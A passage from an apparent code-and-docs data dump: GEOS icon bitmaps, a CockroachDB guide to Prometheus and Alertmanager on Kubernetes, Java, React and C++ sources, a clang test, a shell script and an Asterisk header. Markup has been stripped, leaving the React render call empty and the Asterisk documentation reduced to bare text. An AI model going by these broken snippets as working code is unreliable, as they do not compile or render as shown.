Moniker generated from PCX/deskicon.pcx with pixel 13 masked out\r\n */\r\nstart AppIconAreaSMMonikerResource, data;\r\nvisMoniker DisconnectButtonSMMoniker = {\r\n\tsize = standard;\r\n\tstyle = icon;\r\n\taspectRatio = normal;\r\n\tcolor = gray1;\r\n\tcachedSize = 48, 30;\r\n\tgstring {\r\n\t\tGSBeginString\r\n\t\tGSFillBitmapAtCP 186\r\n\t\tBitmap <48,30,0,BMF_MONO>\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\tdb\t0x00, 0x00, 0x01, 0x00, 0x00, 0x00\r\n\tdb\t0x00, 0x80, 0x21, 0x08, 0x02, 0x00\r\n\tdb\t0x01, 0xc0, 0x11, 0x10, 0x03, 0x00\r\n\tdb\t0x02, 0xc0, 0x11, 0x10, 0x02, 0x80\r\n\tdb\t0x04, 0xc0, 0x08, 0x20, 0x02, 0x40\r\n\tdb\t0x08, 0xc0, 0x08, 0x20, 0x02, 0x20\r\n\tdb\t0x10, 0xff, 0xc4, 0x4f, 0xfe, 0x10\r\n\tdb\t0x20, 0x00, 0x60, 0x08, 0x00, 0x08\r\n\tdb\t0x40, 0x00, 0x60, 0x08, 0x00, 0x04\r\n\tdb\t0x80, 0x00, 0x60, 0x08, 0x00, 0x02\r\n\tdb\t0x40, 0x00, 0x60, 0x08, 0x00, 0x07\r\n\tdb\t0x20, 0x00, 0x60, 0x08, 0x00, 0x0e\r\n\tdb\t0x10, 0xff, 0xe0, 0x0f, 0xfe, 0x1c\r\n\tdb\t0x08, 0xff, 0xe4, 0x47, 0xfe, 0x38\r\n\tdb\t0x04, 0xc0, 0x08, 0x20, 0x02, 0x70\r\n\tdb\t0x02, 0xc0, 0x08, 0x20, 0x02, 0xe0\r\n\tdb\t0x01, 0xc0, 0x11, 0x10, 0x03, 0xc0\r\n\tdb\t0x00, 0xc0, 0x11, 0x10, 0x03, 0x80\r\n\tdb\t0x00, 0x40, 0x21, 0x08, 0x01, 0x00\r\n\tdb\t0x00, 0x00, 0x01, 0x00, 0x00, 
0x00\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\t\tGSEndString\r\n\t}\r\n}\r\nend AppIconAreaSMMonikerResource;\r\n/*\r\n * Moniker generated from PCX/deskicon.pcx with pixel 13 masked out\r\n */\r\nstart AppIconAreaSCGAMonikerResource, data;\r\nvisMoniker DisconnectButtonSCGAMoniker = {\r\n\tsize = tiny;\r\n\tstyle = icon;\r\n\taspectRatio = verySquished;\r\n\tcolor = gray1;\r\n\tcachedSize = 48, 14;\r\n\tgstring {\r\n\t\tGSBeginString\r\n\t\tGSFillBitmapAtCP 90\r\n\t\tBitmap <48,14,0,BMF_MONO>\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\tdb\t0x00, 0x00, 0x81, 0x81, 0x00, 0x00\r\n\tdb\t0x00, 0xc0, 0x61, 0x86, 0x06, 0x00\r\n\tdb\t0x03, 0x70, 0x19, 0x98, 0x05, 0x80\r\n\tdb\t0x0c, 0x7f, 0x84, 0x23, 0xfc, 0x60\r\n\tdb\t0x30, 0x00, 0xe0, 0x02, 0x00, 0x18\r\n\tdb\t0xc0, 0x00, 0xe0, 0x02, 0x00, 0x07\r\n\tdb\t0x30, 0x00, 0xe0, 0x02, 0x00, 0x1f\r\n\tdb\t0x0c, 0x7f, 0xe0, 0x03, 0xfc, 0x7c\r\n\tdb\t0x03, 0x7f, 0xe4, 0x21, 0xfd, 0xf0\r\n\tdb\t0x00, 0xf0, 0x19, 0x98, 0x07, 0xc0\r\n\tdb\t0x00, 0x30, 0x61, 0x86, 0x01, 0x00\r\n\tdb\t0x00, 0x00, 0x81, 0x81, 0x00, 0x00\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\t\tGSEndString\r\n\t}\r\n}\r\nend AppIconAreaSCGAMonikerResource;\r\n"} {"text": "Despite CockroachDB's various [built-in safeguards against failure](high-availability.html), it is critical to actively monitor the overall health and performance of a cluster running in production and to create alerting rules that promptly send notifications when there are events that require investigation or intervention.\n\n### Configure Prometheus\n\nEvery node of a CockroachDB cluster exports granular timeseries metrics formatted for easy integration with [Prometheus](https://prometheus.io/), an open source tool for storing, aggregating, and querying timeseries data. This section shows you how to orchestrate Prometheus as part of your Kubernetes cluster and pull these metrics into Prometheus for external monitoring.\n\nThis guidance is based on [CoreOS's Prometheus Operator](https://github.com/coreos/prometheus-operator/blob/master/Documentation/user-guides/getting-started.md), which allows a Prometheus instance to be managed using built-in Kubernetes concepts.\n\n{{site.data.alerts.callout_info}}\nIf you're on Hosted GKE, before starting, make sure the email address associated with your Google Cloud account is part of the `cluster-admin` RBAC group, as shown in [Step 1. Start Kubernetes](#hosted-gke).\n{{site.data.alerts.end}}\n\n1. From your local workstation, edit the `cockroachdb` service to add the `prometheus: cockroachdb` label:\n\n
\n    {% include copy-clipboard.html %}\n    ~~~ shell\n    $ kubectl label svc cockroachdb prometheus=cockroachdb\n    ~~~\n\n    ~~~\n    service/cockroachdb labeled\n    ~~~\n\n    This ensures that there is a Prometheus job and monitoring data only for the `cockroachdb` service, not for the `cockroachdb-public` service.\n
\n\n
\n    {% include copy-clipboard.html %}\n    ~~~ shell\n    $ kubectl label svc my-release-cockroachdb prometheus=cockroachdb\n    ~~~\n\n    ~~~\n    service/my-release-cockroachdb labeled\n    ~~~\n\n    This ensures that there is a Prometheus job and monitoring data only for the `my-release-cockroachdb` service, not for the `my-release-cockroachdb-public` service.\n
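\n    As an optional sanity check (not part of the original steps), you can confirm that the label is now present on the service before moving on; `--show-labels` is a standard flag of `kubectl get`:\n\n    {% include copy-clipboard.html %}\n    ~~~ shell\n    $ kubectl get svc --show-labels\n    ~~~\n\n    The service you labeled should list `prometheus=cockroachdb` in its `LABELS` column.\n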
\n\n2. Install [CoreOS's Prometheus Operator](https://raw.githubusercontent.com/coreos/prometheus-operator/release-0.20/bundle.yaml):\n\n    {% include copy-clipboard.html %}\n    ~~~ shell\n    $ kubectl apply \\\n    -f https://raw.githubusercontent.com/coreos/prometheus-operator/release-0.20/bundle.yaml\n    ~~~\n\n    ~~~\n    clusterrolebinding.rbac.authorization.k8s.io/prometheus-operator created\n    clusterrole.rbac.authorization.k8s.io/prometheus-operator created\n    serviceaccount/prometheus-operator created\n    deployment.apps/prometheus-operator created\n    ~~~\n\n3. Confirm that the `prometheus-operator` has started:\n\n    {% include copy-clipboard.html %}\n    ~~~ shell\n    $ kubectl get deploy prometheus-operator\n    ~~~\n\n    ~~~\n    NAME                  READY   UP-TO-DATE   AVAILABLE   AGE\n    prometheus-operator   1/1     1            1           27s\n    ~~~\n\n4. Use our [`prometheus.yaml`](https://github.com/cockroachdb/cockroach/blob/master/cloud/kubernetes/prometheus/prometheus.yaml) file to create the various objects necessary to run a Prometheus instance:\n\n    {{site.data.alerts.callout_success}}\n    This configuration defaults to using the Kubernetes CA for authentication.\n    {{site.data.alerts.end}}\n\n    {% include copy-clipboard.html %}\n    ~~~ shell\n    $ kubectl apply \\\n    -f https://raw.githubusercontent.com/cockroachdb/cockroach/master/cloud/kubernetes/prometheus/prometheus.yaml\n    ~~~\n\n    ~~~\n    serviceaccount/prometheus created\n    clusterrole.rbac.authorization.k8s.io/prometheus created\n    clusterrolebinding.rbac.authorization.k8s.io/prometheus created\n    servicemonitor.monitoring.coreos.com/cockroachdb created\n    prometheus.monitoring.coreos.com/cockroachdb created\n    ~~~\n\n5. Access the Prometheus UI locally and verify that CockroachDB is feeding data into Prometheus:\n\n    1. Port-forward from your local machine to the pod running Prometheus:\n\n        {% include copy-clipboard.html %}\n        ~~~ shell\n        $ kubectl port-forward prometheus-cockroachdb-0 9090\n        ~~~\n\n    2. Go to http://localhost:9090 in your browser.\n\n    3. To verify that each CockroachDB node is connected to Prometheus, go to **Status > Targets**. The screen should look like this:\n\n        (Prometheus screenshot)\n\n    4. To verify that data is being collected, go to **Graph**, enter the `sys_uptime` variable in the field, click **Execute**, and then click the **Graph** tab. The screen should look like this:\n\n        (Prometheus screenshot)\n\n    {{site.data.alerts.callout_success}}\n    Prometheus auto-completes CockroachDB time series metrics for you, but if you want to see a full listing, with descriptions, port-forward as described in {% if page.secure == true %}[Access the Admin UI](#step-4-access-the-admin-ui){% else %}[Access the Admin UI](#step-4-access-the-admin-ui){% endif %} and then point your browser to http://localhost:8080/_status/vars.\n\n    For more details on using the Prometheus UI, see their [official documentation](https://prometheus.io/docs/introduction/getting_started/).\n    {{site.data.alerts.end}}\n\n### Configure Alertmanager\n\nActive monitoring helps you spot problems early, but it is also essential to send notifications when there are events that require investigation or intervention. This section shows you how to use [Alertmanager](https://prometheus.io/docs/alerting/alertmanager/) and CockroachDB's starter [alerting rules](https://github.com/cockroachdb/cockroach/blob/master/cloud/kubernetes/prometheus/alert-rules.yaml) to do this.\n\n1. Download our `alertmanager-config.yaml` configuration file:\n\n    {% include copy-clipboard.html %}\n    ~~~ shell\n    $ curl -O \\\n    https://raw.githubusercontent.com/cockroachdb/cockroach/master/cloud/kubernetes/prometheus/alertmanager-config.yaml\n    ~~~\n\n2. Edit the `alertmanager-config.yaml` file to [specify the desired receivers for notifications](https://prometheus.io/docs/alerting/configuration/#receiver). Initially, the file contains a placeholder webhook.\n\n3. Add this configuration to the Kubernetes cluster as a secret, renaming it to `alertmanager.yaml` and labelling it to make it easier to find:\n\n    {% include copy-clipboard.html %}\n    ~~~ shell\n    $ kubectl create secret generic alertmanager-cockroachdb \\\n    --from-file=alertmanager.yaml=alertmanager-config.yaml\n    ~~~\n\n    ~~~\n    secret/alertmanager-cockroachdb created\n    ~~~\n\n    {% include copy-clipboard.html %}\n    ~~~ shell\n    $ kubectl label secret alertmanager-cockroachdb app=cockroachdb\n    ~~~\n\n    ~~~\n    secret/alertmanager-cockroachdb labeled\n    ~~~\n\n    {{site.data.alerts.callout_danger}}\n    The name of the secret, `alertmanager-cockroachdb`, must match the name used in the `alertmanager.yaml` file. If they differ, the Alertmanager instance will start without configuration, and nothing will happen.\n    {{site.data.alerts.end}}\n\n4. Use our [`alertmanager.yaml`](https://github.com/cockroachdb/cockroach/blob/master/cloud/kubernetes/prometheus/alertmanager.yaml) file to create the various objects necessary to run an Alertmanager instance, including a ClusterIP service so that Prometheus can forward alerts:\n\n    {% include copy-clipboard.html %}\n    ~~~ shell\n    $ kubectl apply \\\n    -f https://raw.githubusercontent.com/cockroachdb/cockroach/master/cloud/kubernetes/prometheus/alertmanager.yaml\n    ~~~\n\n    ~~~\n    alertmanager.monitoring.coreos.com/cockroachdb created\n    service/alertmanager-cockroachdb created\n    ~~~\n\n5. Verify that Alertmanager is running:\n\n    1. Port-forward from your local machine to the pod running Alertmanager:\n\n        {% include copy-clipboard.html %}\n        ~~~ shell\n        $ kubectl port-forward alertmanager-cockroachdb-0 9093\n        ~~~\n\n    2. Go to http://localhost:9093 in your browser. The screen should look like this:\n\n        (Alertmanager screenshot)\n\n6. Ensure that the Alertmanagers are visible to Prometheus by opening http://localhost:9090/status. The screen should look like this:\n\n    (Alertmanager screenshot)\n\n7. Add CockroachDB's starter [alerting rules](https://github.com/cockroachdb/cockroach/blob/master/cloud/kubernetes/prometheus/alert-rules.yaml):\n\n    {% include copy-clipboard.html %}\n    ~~~ shell\n    $ kubectl apply \\\n    -f https://raw.githubusercontent.com/cockroachdb/cockroach/master/cloud/kubernetes/prometheus/alert-rules.yaml\n    ~~~\n\n    ~~~\n    prometheusrule.monitoring.coreos.com/prometheus-cockroachdb-rules created\n    ~~~\n\n8. Ensure that the rules are visible to Prometheus by opening http://localhost:9090/rules. The screen should look like this:\n\n    (Alertmanager screenshot)\n\n9. Verify that the `TestAlertManager` example alert is firing by opening http://localhost:9090/alerts. The screen should look like this:\n\n    (Alertmanager screenshot)\n\n10. To remove the example alert:\n\n    1. Use the `kubectl edit` command to open the rules for editing:\n\n        {% include copy-clipboard.html %}\n        ~~~ shell\n        $ kubectl edit prometheusrules prometheus-cockroachdb-rules\n        ~~~\n\n    2. 
Remove the `dummy.rules` block and save the file:\n\n ~~~\n - name: rules/dummy.rules\n rules:\n - alert: TestAlertManager\n expr: vector(1)\n ~~~\n"} {"text": "/*\n * Copyright 2008-2012 the original author or authors.\n *\n * Licensed under the Apache License, Version 2.0 (the \"License\");\n * you may not use this file except in compliance with the License.\n * You may obtain a copy of the License at\n *\n * http://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n */\n\npackage com.mycompany.controller.checkout;\n\nimport org.broadleafcommerce.core.web.controller.checkout.BroadleafOrderConfirmationController;\nimport org.springframework.stereotype.Controller;\nimport org.springframework.ui.Model;\nimport org.springframework.web.bind.annotation.PathVariable;\nimport org.springframework.web.bind.annotation.RequestMapping;\nimport org.springframework.web.bind.annotation.RequestMethod;\n\nimport javax.servlet.http.HttpServletRequest;\nimport javax.servlet.http.HttpServletResponse;\n\n@Controller\npublic class OrderConfirmationController extends BroadleafOrderConfirmationController {\n \n @Override\n @RequestMapping(value = \"/confirmation/{orderNumber}\", method = RequestMethod.GET)\n public String displayOrderConfirmationByOrderNumber(@PathVariable(\"orderNumber\") String orderNumber, Model model,\n HttpServletRequest request, HttpServletResponse response) {\n return super.displayOrderConfirmationByOrderNumber(orderNumber, model, request, response);\n }\n\n}\n"} {"text": "import React from 'react';\r\nimport ReactDOMServer from 'react-dom/server';\r\nimport ServerHtml from './ServerHtml';\r\nimport componentFactory from './componentFactory';\r\n\r\nexport function serverRenderer(renderingData, viewBag) {\r\n const { componentName, uid: renderingUid } = renderingData.rendering;\r\n const ComponentInstance = componentFactory(componentName);\r\n const componentProps = {\r\n ...renderingData,\r\n viewBag,\r\n };\r\n\r\n // is the HTML wrapper (div) around the component contents when SSR-ing\r\n // Necessary because ReactDOM.render() or .hydrate() needs a DOM element in which to mount the component.\r\n const result = ReactDOMServer.renderToString(\r\n \r\n \r\n \r\n );\r\n\r\n return result;\r\n}\r\n"} {"text": "#include \"adriadialog.h\"\n#include \"../../faworld/item/itembase.h\"\n#include \"../guimanager.h\"\n#include \"../shopdialogs.h\"\n\nnamespace FAGui\n{\n AdriaDialog::AdriaDialog(GuiManager& guiManager, FAWorld::Actor* actor)\n : CharacterDialoguePopup(guiManager, false, \"sfx/towners/Witch38.wav\"), mActor(actor)\n {\n auto& gossipData = mActor->getGossipData();\n for (auto& gossip : gossipData)\n {\n if (gossip.first == \"general1\")\n gossip.second.talkAudioPath = \"sfx/towners/witch39.wav\";\n\n else if (gossip.first == \"general2\")\n gossip.second.talkAudioPath = \"sfx/towners/witch40.wav\";\n\n else if (gossip.first == \"general3\")\n gossip.second.talkAudioPath = \"sfx/towners/witch41.wav\";\n\n else if (gossip.first == \"general4\")\n gossip.second.talkAudioPath = \"sfx/towners/witch42.wav\";\n\n else if (gossip.first == \"cain\")\n gossip.second.talkAudioPath = \"sfx/towners/witch45.wav\";\n\n else if (gossip.first == \"farnham\")\n gossip.second.talkAudioPath 
= \"sfx/towners/witch46.wav\";\n\n else if (gossip.first == \"gillian\")\n gossip.second.talkAudioPath = \"sfx/towners/witch44.wav\";\n\n else if (gossip.first == \"griswold\")\n gossip.second.talkAudioPath = \"sfx/towners/witch43.wav\";\n\n else if (gossip.first == \"ogden\")\n gossip.second.talkAudioPath = \"sfx/towners/witch50.wav\";\n\n else if (gossip.first == \"pepin\")\n gossip.second.talkAudioPath = \"sfx/towners/witch47.wav\";\n\n else if (gossip.first == \"priest\")\n gossip.second.talkAudioPath = \"sfx/towners/witch48.wav\";\n\n else if (gossip.first == \"wirt\")\n gossip.second.talkAudioPath = \"sfx/towners/witch49.wav\";\n }\n\n // auto& questData = mActor->getQuestTalkData();\n // for (auto& quest : questData)\n // {\n // if (quest.first == \"anvilOfFury\")\n // quest.second.info.talkAudioPath = \"\";\n //\n // else if (quest.first == \"archbishopLazarus\")\n // quest.second.info.talkAudioPath = \"\";\n //\n // else if (quest.first == \"blackMushroom\")\n // {\n // quest.second.activation.talkAudioPath = \"\";\n // quest.second.returned[0].talkAudioPath = \"\";\n // quest.second.returned[1].talkAudioPath = \"\";\n // quest.second.returned[2].talkAudioPath = \"\";\n // quest.second.completion.talkAudioPath = \"\";\n // }\n //\n // else if (quest.first == \"hallsOfTheBlind\")\n // quest.second.info.talkAudioPath = \"\";\n //\n // else if (quest.first == \"lachdanan\")\n // quest.second.info.talkAudioPath = \"\";\n //\n // else if (quest.first == \"ogdensSign\")\n // quest.second.info.talkAudioPath = \"\";\n //\n // else if (quest.first == \"poisonedWaterSupply\")\n // quest.second.info.talkAudioPath = \"\";\n //\n // else if (quest.first == \"theButcher\")\n // quest.second.info.talkAudioPath = \"\";\n //\n // else if (quest.first == \"theChamberOfBone\")\n // quest.second.info.talkAudioPath = \"\";\n //\n // else if (quest.first == \"theCurseOfKingLeoric\")\n // quest.second.info.talkAudioPath = \"\";\n //\n // else if (quest.first == \"theMagicRock\")\n // quest.second.info.talkAudioPath = \"\";\n //\n // else if (quest.first == \"valor\")\n // quest.second.info.talkAudioPath = \"\";\n //\n // else if (quest.first == \"warlordOfBlood\")\n // quest.second.info.talkAudioPath = \"\";\n // }\n }\n\n CharacterDialoguePopup::DialogData AdriaDialog::getDialogData()\n {\n DialogData retval;\n auto& td = mActor->getMenuTalkData();\n\n retval.introduction = {{td.at(\"introductionHeader\"), TextColor::golden, false}};\n\n retval.addMenuOption({{td.at(\"introduction\"), TextColor::golden, false}, {}}, []() { return CharacterDialoguePopup::UpdateResult::DoNothing; });\n\n retval.addMenuOption({{td.at(\"talk\"), TextColor::blue}}, [this]() {\n openTalkDialog(mActor);\n return CharacterDialoguePopup::UpdateResult::DoNothing;\n });\n retval.addMenuOption({{td.at(\"buy\")}}, []() { return CharacterDialoguePopup::UpdateResult::DoNothing; });\n retval.addMenuOption({{td.at(\"sell\")}}, [this]() {\n this->openSellDialog();\n return CharacterDialoguePopup::UpdateResult::DoNothing;\n });\n retval.addMenuOption({{td.at(\"recharge\")}}, []() { return CharacterDialoguePopup::UpdateResult::DoNothing; });\n retval.addMenuOption({{td.at(\"quit\")}}, []() { return CharacterDialoguePopup::UpdateResult::PopDialog; });\n\n return retval;\n }\n\n void AdriaDialog::openSellDialog()\n {\n auto dialog = new ShopSellDialog(mGuiManager, *mActor, adriaSellFilter);\n mGuiManager.mDialogManager.pushDialog(dialog);\n }\n\n bool AdriaDialog::adriaSellFilter(const FAWorld::Item* item)\n {\n // TODO: add check for quest 
items\n return item->getBase()->mType == ItemType::misc || item->getBase()->mType == ItemType::staff;\n }\n}\n"} {"text": "{\n \"coverage\": {\n \"country\": \"ca\",\n \"state\": \"on\",\n \"county\": \"Norfolk\"\n },\n \"schema\": 2,\n \"layers\": {\n \"addresses\": [\n {\n \"name\": \"county\",\n \"website\": \"http://opendata.norfolkcounty.ca/datasets/civic-addresses\",\n \"data\": \"https://services1.arcgis.com/mSGV2hCLXHNsfQqK/arcgis/rest/services/CivicAddresses/FeatureServer/0\",\n \"license\": {\n \"url\": \"http://data-norfolk.opendata.arcgis.com/pages/terms-of-use\",\n \"text\": \"Contains public sector Information made available under Norfolk County's Open Data Licence\",\n \"attribution\": true,\n \"share-alike\": false\n },\n \"protocol\": \"ESRI\",\n \"conform\": {\n \"format\": \"geojson\",\n \"number\": \"NUMBER_\",\n \"street\": [\n \"Bell_Name\",\n \"Bell_Suf\",\n \"Bell_Dir\"\n ],\n \"unit\": \"UnitNumber\"\n }\n }\n ]\n }\n}\n"} {"text": "// Test that call site debug info is (un)supported in various configurations.\n\n// Supported: DWARF5, -O1, standalone DI\n// RUN: %clang_cc1 -emit-llvm -triple %itanium_abi_triple %s -o - \\\n// RUN: -O1 -disable-llvm-passes \\\n// RUN: -debug-info-kind=standalone -dwarf-version=5 \\\n// RUN: | FileCheck %s -check-prefix=HAS-ATTR \\\n// RUN: -implicit-check-not=DISubprogram -implicit-check-not=DIFlagAllCallsDescribed\n\n// Supported: DWARF4 + LLDB tuning, -O1, limited DI\n// RUN: %clang_cc1 -emit-llvm -triple %itanium_abi_triple %s -o - \\\n// RUN: -O1 -disable-llvm-passes \\\n// RUN: -debugger-tuning=lldb \\\n// RUN: -debug-info-kind=standalone -dwarf-version=4 \\\n// RUN: | FileCheck %s -check-prefix=HAS-ATTR \\\n// RUN: -implicit-check-not=DISubprogram -implicit-check-not=DIFlagAllCallsDescribed\n\n// Supported: DWARF4 + GDB tuning by using '-femit-debug-entry-values'\n// RUN: %clang_cc1 -femit-debug-entry-values -emit-llvm -triple x86_64-linux-gnu \\\n// RUN: %s -o - -O1 -disable-llvm-passes -debugger-tuning=gdb \\\n// RUN: -debug-info-kind=standalone -dwarf-version=4 \\\n// RUN: | FileCheck %s -check-prefix=HAS-ATTR \\\n// RUN: -implicit-check-not=DIFlagAllCallsDescribed\n\n// Supported: DWARF4 + LLDB tuning by using '-femit-debug-entry-values'\n// RUN: %clang_cc1 -femit-debug-entry-values -emit-llvm -triple x86_64-linux-gnu \\\n// RUN: %s -o - -O1 -disable-llvm-passes -debugger-tuning=lldb \\\n// RUN: -debug-info-kind=standalone -dwarf-version=4 \\\n// RUN: | FileCheck %s -check-prefix=HAS-ATTR \\\n// RUN: -implicit-check-not=DIFlagAllCallsDescribed\n\n// Unsupported: -O0 + '-femit-debug-entry-values'\n// RUN: %clang_cc1 -femit-debug-entry-values -emit-llvm -triple x86_64-linux-gnu \\\n// RUN: %s -o - -O0 -disable-llvm-passes -debugger-tuning=gdb \\\n// RUN: -debug-info-kind=standalone -dwarf-version=4 \\\n// RUN: | FileCheck %s -check-prefix=NO-ATTR\n\n// Supported: DWARF4 + LLDB tuning, -O1, line-tables only DI\n// RUN: %clang_cc1 -emit-llvm -triple %itanium_abi_triple %s -o - \\\n// RUN: -O1 -disable-llvm-passes \\\n// RUN: -debugger-tuning=lldb \\\n// RUN: -debug-info-kind=line-tables-only -dwarf-version=4 \\\n// RUN: | FileCheck %s -check-prefix=LINE-TABLES-ONLY\n\n// Unsupported: -O0\n// RUN: %clang_cc1 -emit-llvm -triple %itanium_abi_triple %s -o - \\\n// RUN: -O0 \\\n// RUN: -debug-info-kind=standalone -dwarf-version=5 \\\n// RUN: | FileCheck %s -check-prefix=NO-ATTR\n\n// Unsupported: DWARF4\n// RUN: %clang_cc1 -emit-llvm -triple %itanium_abi_triple %s -o - \\\n// RUN: -O1 -disable-llvm-passes \\\n// RUN: 
-debug-info-kind=standalone -dwarf-version=4 \\\n// RUN: | FileCheck %s -check-prefix=NO-ATTR\n\n// NO-ATTR-NOT: FlagAllCallsDescribed\n\n// HAS-ATTR-DAG: DISubprogram(name: \"declaration1\", {{.*}}, flags: DIFlagPrototyped\n// HAS-ATTR-DAG: DISubprogram(name: \"declaration2\", {{.*}}, flags: DIFlagPrototyped | DIFlagAllCallsDescribed, spFlags: DISPFlagDefinition\n// HAS-ATTR-DAG: DISubprogram(name: \"struct1\", {{.*}}, flags: DIFlagPrototyped, spFlags: DISPFlagOptimized)\n// HAS-ATTR-DAG: DISubprogram(name: \"struct1\", {{.*}}, flags: DIFlagPrototyped | DIFlagAllCallsDescribed, spFlags: DISPFlagDefinition\n// HAS-ATTR-DAG: DISubprogram(name: \"method1\", {{.*}}, flags: DIFlagPrototyped | DIFlagAllCallsDescribed, spFlags: DISPFlagDefinition\n// HAS-ATTR-DAG: DISubprogram(name: \"force_irgen\", {{.*}}, flags: DIFlagPrototyped | DIFlagAllCallsDescribed, spFlags: DISPFlagDefinition\n\n// LINE-TABLES-ONLY: DISubprogram(name: \"force_irgen\", {{.*}}, flags: DIFlagPrototyped | DIFlagAllCallsDescribed, spFlags: DISPFlagDefinition\n\nvoid declaration1();\n\nvoid declaration2();\n\nvoid declaration2() {}\n\nstruct struct1 {\n struct1() {}\n void method1() {}\n};\n\nvoid __attribute__((optnone)) force_irgen() {\n declaration1();\n struct1().method1();\n}\n"} {"text": "#!/bin/sh -e\ntrap 'exit 2' HUP INT PIPE TERM\nif [ \"$1\" = -fork ]; then\n\tshift\n\tfor d in `dirname $0`/build*; do\n\t\t(cd ./$d\n\t\t echo n | ./mvm \"$@\") &\n\tdone\n\twait\nelse\n\tfor d in `dirname $0`/build*; do\n\t\t(cd ./$d\n\t\t echo n | ./mvm \"$@\")\n\tdone\nfi\n"} {"text": "/*\n * Asterisk -- An open source telephony toolkit.\n *\n * Copyright (C) 1999-2006, Digium, Inc.\n *\n * Portions Copyright (C) 2005, Anthony Minessale II\n *\n * See http://www.asterisk.org for more information about\n * the Asterisk project. Please do not directly contact\n * any of the maintainers of this project for assistance;\n * the project provides a web site, mailing lists and IRC\n * channels for your use.\n *\n * This program is free software, distributed under the terms of\n * the GNU General Public License Version 2. See the LICENSE file\n * at the top of the source tree.\n */\n\n/*! 
\\file\n *\n * \\brief Call Detail Record related dialplan functions\n *\n * \\author Anthony Minessale II\n *\n * \\ingroup functions\n */\n\n/*** MODULEINFO\n\tcore\n ***/\n\n#include \"asterisk.h\"\n\n#include \"asterisk/module.h\"\n#include \"asterisk/channel.h\"\n#include \"asterisk/pbx.h\"\n#include \"asterisk/utils.h\"\n#include \"asterisk/app.h\"\n#include \"asterisk/cdr.h\"\n#include \"asterisk/stasis.h\"\n#include \"asterisk/stasis_message_router.h\"\n\n/*** DOCUMENTATION\n\t\n\t\t\n\t\t\tGets or sets a CDR variable.\n\t\t\n\t\t\n\t\t\t\n\t\t\t\tCDR field name:\n\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tCaller ID.\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tLast application arguments.\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tThe final state of the CDR.\n\t\t\t\t\t\t\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tNO ANSWER\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tNO ANSWER (NULL record)\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tFAILED\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tBUSY\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tANSWERED\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tCONGESTION\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tSource.\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tTime the call started.\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tR/W the Automatic Message Accounting (AMA) flags on the channel.\n\t\t\t\t\t\tWhen read from a channel, the integer value will always be returned.\n\t\t\t\t\t\tWhen written to a channel, both the string format or integer value\n\t\t\t\t\t\tis accepted.\n\t\t\t\t\t\t\n\t\t\t\t\t\t\tOMIT\n\t\t\t\t\t\t\tBILLING\n\t\t\t\t\t\t\tDOCUMENTATION\n\t\t\t\t\t\t\n\t\t\t\t\t\tAccessing this setting is deprecated in CDR. Please use the CHANNEL function instead.\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tDestination.\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tTime the call was answered.\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tThe channel's account code.\n\t\t\t\t\t\tAccessing this setting is deprecated in CDR. Please use the CHANNEL function instead.\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tDestination context.\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tTime the call ended.\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tThe channel's unique id.\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tDestination channel.\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tDuration of the call.\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tThe channel's user specified field.\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tLast application.\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tDuration of the call once it was answered.\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tChannel name.\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tCDR sequence number.\n\t\t\t\t\t\n\t\t\t\t\n\t\t\t\n\t\t\t\n\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\tAll of the CDR field names are read-only, except for accountcode,\n\t\t\tuserfield, and amaflags. You may, however, supply\n\t\t\ta name not on the above list, and create your own variable, whose value can be changed\n\t\t\twith this function, and this variable will be stored on the CDR.\n\t\t\tCDRs can only be modified before the bridge between two channels is\n\t\t\ttorn down. 
